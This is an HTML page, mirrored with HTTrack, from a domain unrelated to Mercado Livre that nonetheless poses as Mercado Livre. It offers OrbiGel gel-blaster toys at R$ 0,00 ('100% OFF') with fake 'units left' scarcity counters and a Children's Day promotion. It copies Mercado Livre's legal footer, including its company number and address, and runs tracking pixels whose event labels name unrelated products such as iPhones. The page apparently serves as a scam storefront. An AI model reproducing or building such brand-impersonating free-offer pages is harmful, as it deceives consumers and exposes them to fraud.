<html lang="pt-br">
<!-- Mirrored from recentessnoticias.online/orbi/loja/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 12 Sep 2024 04:22:40 GMT -->
<head>
  
  <meta charset="UTF-8">


<script>
  window.pixelId = "66bed225834c3bc6cf30a6d5";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "../../../cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script><script async="" defer="" src="js/pixel.js"></script>


    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <title>Mercado Livre</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link rel="icon" href="images/favicon.png">
    <link rel="shortcut icon" href="images/favicon.png">
    <link rel="stylesheet" href="css/products.css">
    <link rel="stylesheet" href="css/styles2.css">
    <link rel="stylesheet" href="css/fonts.css">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@24,400,1,0">
    <style>
      .free-shipping-container {
        margin-bottom: 6px;
      }

      .estoque {
        font-size: 10pt;
        padding: 3px;
      }

      .estoque-verde {
        color: rgb(0, 132, 18);
        background-color: #CBFFC7;
      }

      .estoque-amarelo {
        color: rgb(132, 121, 0);
        background-color: #ffffc7;
      }

      .estoque-vermelho {
        color: rgb(255, 46, 46);
        background-color: #FFDCDC;
      }

      .product-name {
        margin-top: 5px;
      }
    </style>
<meta charset="utf-8">

  </head>
  <body>
    <div style="background-color: #e6cf00; text-align: center; padding: 5px; font-family: 'GellixMedium'; font-size: 13px; color: white">Promoção exclusiva: Dias das Crianças</div>
    <nav class="navbar" style="padding-top: 15px;">
      <div class="menu-icon" style="padding-left: 3%;">
        <img src="images/logo.webp" style="height: 5vh;" alt="Logo Central Vivara">
      </div>
      <div class="logo-central"></div>
      <div class="menu-icon" style="padding-right: 3%;">
        <span class="material-symbols-outlined" style="font-size: 30px; padding-right: 10px; color: black">menu</span>
      </div>
    </nav>
    <img src="images/bannerrecompensas.png" style="width: 100%; margin-top: -2px;">
    <div class="bracelet-grid">



      <div class="bracelet-item" onclick="window.location.href='akAzul.html' + window.location.search; fbq('track', 'ViewContent', {content_name: 'iPhone 15 Pro'});">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/akazul_1.png" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">OFERTA DO DIA</div>
          <div class="old-price">R$ 226,90</div>
          <span class="new-price">R$ 0,00</span>
          <span class="discount">100% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-vermelho">Restam 7 unidades</span>
          <p class="product-name">Lançador OrbiGel AK - Azul</span>
          </p>
        </div>
      </div>





      <div class="bracelet-item" onclick="window.location.href='akVermelho.html' + window.location.search; fbq('track', 'ViewContent', {content_name: 'iPhone 15 Pro Max'});">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/akred_1.png" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">OFERTA DO DIA</div>
          <div class="old-price">R$ 226,90</div>
          <span class="new-price">R$ 0,00</span>
          <span class="discount">100% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-vermelho">Restam 8 unidades</span>
          <p class="product-name">Lançador OrbiGel AK - Vermelho</span>
          </p>
        </div>
      </div>








      <div class="bracelet-item" onclick="window.location.href = 'm4Azul.html' + window.location.search; fbq('track', 'ViewContent', {content_name: 'JBL Boombox 3'});">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/azulm4_1.png" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">OFERTA DO DIA</div>
          <div class="old-price">R$ 206,90</div>
          <span class="new-price">R$ 0,00</span>
          <span class="discount">100% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-verde">Restam 19 unidades</span>
          <p class="product-name">Lançador OrbiGel M4 - Azul</span>
          </p>
        </div>
      </div>







      <div class="bracelet-item" onclick="window.location.href='m4Vermelho.html' + window.location.search; fbq('track', 'ViewContent', {content_name: 'Samsung The Freestyle Projetor Smart Portátil'});">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/redm4_1.png" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">OFERTA DO DIA</div>
          <div class="old-price">R$ 206,90</div>
          <span class="new-price">R$ 0,00</span>
          <span class="discount">100% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-amarelo">Restam 10 unidades</span>
          <p class="product-name">Lançador OrbiGel M4 - Vermelho</p>
        </div>
      </div>



      <div class="bracelet-item" onclick="window.location.href='pistol.html' + window.location.search; fbq('track', 'ViewContent', {content_name: 'JBL Flip 6'});">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/2pistol_1.png" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">OFERTA DO DIA</div>
          <div class="old-price">R$ 336,00</div>
          <span class="new-price">R$ 0,00</span>
          <span class="discount">100% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-verde">Restam 14 unidades</span>
          <p class="product-name">KIT 2 Pistola OrbiGel - Azul e Vermelho</span>
          </p>
        </div>
      </div>







      
      <div class="bracelet-item">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/esgotado.png" style="height: 115px; width: auto; margin-top: 20px;">
        </div>
        <div class="product-info">
          <div class="offer-tag">OFERTA DO DIA</div>
          <div class="offer-tag" style="background-color: red; margin-top: 20px; margin-bottom: 5px;">
            <div class="free-shipping-container">
              <span class="free-shipping" style="font-family: 'GellixMedium'; color: white;">
                <span class="material-symbols-outlined" style="color:white; margin-right: 2px; font-size: 18px; margin-left: 0px;">close</span>
                <span style="font-family: 'GellixSemiBold'; margin-right: 5px;">SEM ESTOQUE</span>
              </span>
            </div>
          </div>
          <p class="product-name">Pistola OrbiGel - GunCraft</span>
          </p>
        </div>
      </div>
    </div>
    <div class="divisoria2"></div>
    <p style="margin-left: 3%; margin-right: 3%; font-family: 'GellixRegular'; font-size: 14px; padding-top: 5px;">
      <span style="font-family: 'GellixSemiBold';">Termos e condições. Como cuidamos da sua privacidade. Acessibilidade Informações sobre seguros Blog Afiliados Tendências</span>
      <br>
      <br>© 1999-2024 Ebazar.com.br LTDA. CNPJ n.º 03.007.331/0001-41 / Av. das Nações Unidas, nº 3.003, Bonfim, Osasco/SP - CEP 06233-903 - empresa do grupo Mercado Livre. <span style="font-family: 'GellixSemiBold';">
        <br>
        <br>Brasil/Português </span>
    </p>


  
</body>
<!-- Mirrored from recentessnoticias.online/orbi/loja/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 12 Sep 2024 04:22:40 GMT -->
</html>